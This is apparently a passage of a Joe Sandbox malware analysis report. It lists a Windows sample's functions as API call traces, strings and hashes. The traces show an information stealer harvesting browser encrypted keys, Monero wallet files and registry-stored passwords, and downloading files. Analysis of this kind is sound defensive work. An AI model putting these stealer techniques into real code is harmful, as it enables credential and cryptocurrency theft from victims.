                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 1cdc4c5e435e60008b46b5dfd4900eeda3e9f5807bd49442a7cf88780a5800ef
                                      • Instruction ID: 4148ddae712885aaafabc58eef837f7579e599aaea3b6c0be1d4c6bc6f88c0fd
                                      • Opcode Fuzzy Hash: 1cdc4c5e435e60008b46b5dfd4900eeda3e9f5807bd49442a7cf88780a5800ef
                                      • Instruction Fuzzy Hash: E8C1A7B59001299BCB18EFA0EC9AFDE73B9BF64304F004599F40967281DB74EA85DF91
                                      Function 00F244D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F2453C
                                      • lstrcat.KERNEL32(?,01D8E398), ref: 00F2455B
                                      • lstrcat.KERNEL32(?,?), ref: 00F2456F
                                      • lstrcat.KERNEL32(?,01D8D590), ref: 00F24583
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F28F20: GetFileAttributesA.KERNEL32(00000000,?,00F11B94,?,?,00F3577C,?,?,00F30E22), ref: 00F28F2F
                                        • Part of subcall function 00F1A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F1A489
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F29550: GlobalAlloc.KERNEL32(00000000,00F2462D,00F2462D), ref: 00F29563
                                      • StrStrA.SHLWAPI(?,01D8E1E8), ref: 00F24643
                                      • GlobalFree.KERNEL32(?), ref: 00F24762
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A23F
                                        • Part of subcall function 00F1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F14F3E,00000000,?), ref: 00F1A251
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A27A
                                        • Part of subcall function 00F1A210: LocalFree.KERNEL32(?,?,?,?,00F14F3E,00000000,?), ref: 00F1A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F246F3
                                      • StrCmpCA.SHLWAPI(?,00F308D2), ref: 00F24710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F24722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00F24735
                                      • lstrcat.KERNEL32(00000000,00F30FA0), ref: 00F24744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 5a1dd86ebd23644611f01ef39cf091cedfba76f47ca5acfe98c10eca59429d29
                                      • Instruction ID: ec413d89488944bb60086645c01248bfacd2744c3e29be8ed7afc1497e19d815
                                      • Opcode Fuzzy Hash: 5a1dd86ebd23644611f01ef39cf091cedfba76f47ca5acfe98c10eca59429d29
                                      • Instruction Fuzzy Hash: B97155B6D00218ABDB14EBE0ED96FDE7379AF88300F004598F61596185EB74EB84DF91
                                      Function 00F11310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F112B4
                                        • Part of subcall function 00F112A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F112BB
                                        • Part of subcall function 00F112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F112D7
                                        • Part of subcall function 00F112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F112F5
                                        • Part of subcall function 00F112A0: RegCloseKey.ADVAPI32(?), ref: 00F112FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1134F
                                      • lstrlen.KERNEL32(?), ref: 00F1135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00F11377
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F11465
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F114EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: fffccd10ce184cd49f05500d9c81f5ad117abf381be7957855f9c2b696388e9a
                                      • Instruction ID: 91f43ab638fd4b89adbe9d4dc4986208cba6ae7008855498b70dd26ff66f3c8e
                                      • Opcode Fuzzy Hash: fffccd10ce184cd49f05500d9c81f5ad117abf381be7957855f9c2b696388e9a
                                      • Instruction Fuzzy Hash: A55146B1D501295BCB15EB60EDA2FED737DAF54700F4045E8B60962081EF346B88DFA6
                                      Function 00F19A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(00F30AF6,00000001,00000000,00000000,00000000), ref: 00F19A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F19AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00F19AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: a7e0ff95d89b53ee2bde935a2b96dc58d52333469704fd4c540a8e0d40932bc8
                                      • Instruction ID: 0c5da57a705582d6ba24713eae59fa8839008651631d1ace0881d4bbb5f3dae4
                                      • Opcode Fuzzy Hash: a7e0ff95d89b53ee2bde935a2b96dc58d52333469704fd4c540a8e0d40932bc8
                                      • Instruction Fuzzy Hash: 21413F76A50218ABDB18EF94DCA5FDD77B5BB48750F104098F509AB180CBB4AEC0EB90
                                      Function 00F17630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F17330: memset.MSVCRT ref: 00F17374
                                        • Part of subcall function 00F17330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F1739A
                                        • Part of subcall function 00F17330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F17411
                                        • Part of subcall function 00F17330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F1746D
                                        • Part of subcall function 00F17330: GetProcessHeap.KERNEL32(00000000,?), ref: 00F174B2
                                        • Part of subcall function 00F17330: HeapFree.KERNEL32(00000000), ref: 00F174B9
                                      • lstrcat.KERNEL32(00000000,00F3192C), ref: 00F17666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F176A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00F176BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F176EF
                                      • lstrcat.KERNEL32(00000000,00F31934), ref: 00F17700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F17733
                                      • lstrcat.KERNEL32(00000000,00F31938), ref: 00F1774D
                                      • task.LIBCPMTD ref: 00F1775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: 2775064e146eb39a92a843761c8cf1d33ade6ef862bbaabef3b0da9f31ce59d4
                                      • Instruction ID: 9cc44c1972e293405b3f0dcfab851e94827928a1a32a9c08614c37be591aafeb
                                      • Opcode Fuzzy Hash: 2775064e146eb39a92a843761c8cf1d33ade6ef862bbaabef3b0da9f31ce59d4
                                      • Instruction Fuzzy Hash: 8A318376D00105EBEB18EBE0DD95DFE77B8AB44300F104118F116672D4CB34A9C6DB90
                                      Function 00F17330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00F17374
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F1739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F17411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F1746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F174B2
                                      • HeapFree.KERNEL32(00000000), ref: 00F174B9
                                      • task.LIBCPMTD ref: 00F175B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: Password
                                      • API String ID: 2808661185-3434357891
                                      • Opcode ID: 24b288d915b96cdfdd2ec75e88e9968fb1b83da5477e058cbc797cd01e5ca9a0
                                      • Instruction ID: a3574dd6eb01c67338f6eff320db2e3539130e4abbb40d254e8f8f7a8dc9bfbb
                                      • Opcode Fuzzy Hash: 24b288d915b96cdfdd2ec75e88e9968fb1b83da5477e058cbc797cd01e5ca9a0
                                      • Instruction Fuzzy Hash: 73614DB5C0426C9BDB24DB50CC51BD9B3B9BF58300F0081E9E649A6141EFB46BC9DF90
                                      Function 00F28290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01D8DFC0,00000000,?,00F30E14,00000000,?,00000000), ref: 00F282C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F282C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F282E8
                                      • __aulldiv.LIBCMT ref: 00F28302
                                      • __aulldiv.LIBCMT ref: 00F28310
                                      • wsprintfA.USER32 ref: 00F2833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 7ee920ec290769c81b53a6ae083243a1654493ce9e959c940c6e7b7b6a8d4a3d
                                      • Instruction ID: a2a0369f75f982d5341e79d6347852946092ef61b2c6a79968a473a22dd6b18c
                                      • Opcode Fuzzy Hash: 7ee920ec290769c81b53a6ae083243a1654493ce9e959c940c6e7b7b6a8d4a3d
                                      • Instruction Fuzzy Hash: AC215CB1E44219ABEB14DFD4DC4AFAEBBB8FB44B10F104519F215BB2C0C77869018BA5
                                      Function 00F19E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                      • wsprintfA.USER32 ref: 00F19E7F
                                      • memset.MSVCRT ref: 00F19EED
                                      • lstrcat.KERNEL32(00000000,?), ref: 00F19F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00F19F17
                                      • lstrcat.KERNEL32(00000000,00F312D8), ref: 00F19F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00F19F7C
                                      • memset.MSVCRT ref: 00F19F9C
                                      • Sleep.KERNEL32(00001388), ref: 00F1A013
                                        • Part of subcall function 00F299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F299C5
                                        • Part of subcall function 00F299A0: Process32First.KERNEL32(00F1A056,00000128), ref: 00F299D9
                                        • Part of subcall function 00F299A0: Process32Next.KERNEL32(00F1A056,00000128), ref: 00F299F2
                                        • Part of subcall function 00F299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F29A4E
                                        • Part of subcall function 00F299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F29A6C
                                        • Part of subcall function 00F299A0: CloseHandle.KERNEL32(00000000), ref: 00F29A79
                                        • Part of subcall function 00F299A0: CloseHandle.KERNEL32(00F1A056), ref: 00F29A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 3242155833-2746444292
                                      • Opcode ID: 4e13d586502d0924cf4b5b1a0c1846fd7236072a0caa3c4f6f4eca228c28dd76
                                      • Instruction ID: 38ce6bc56f8195c896a5e8bafa3ac8c53d297c60da1c40c5f30a112eb9aabaa0
                                      • Opcode Fuzzy Hash: 4e13d586502d0924cf4b5b1a0c1846fd7236072a0caa3c4f6f4eca228c28dd76
                                      • Instruction Fuzzy Hash: EF5174B1944318ABEB24DBA0DC4AFDA7778AF44700F444598F60DAB2C1EB75AB84CF51
                                      Function 00F160F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                      • InternetOpenA.WININET(00F30DFB,00000001,00000000,00000000,00000000), ref: 00F1615F
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F161DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F16203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00F1622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F1625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00F16299
                                      • InternetCloseHandle.WININET(?), ref: 00F162A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00F162B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
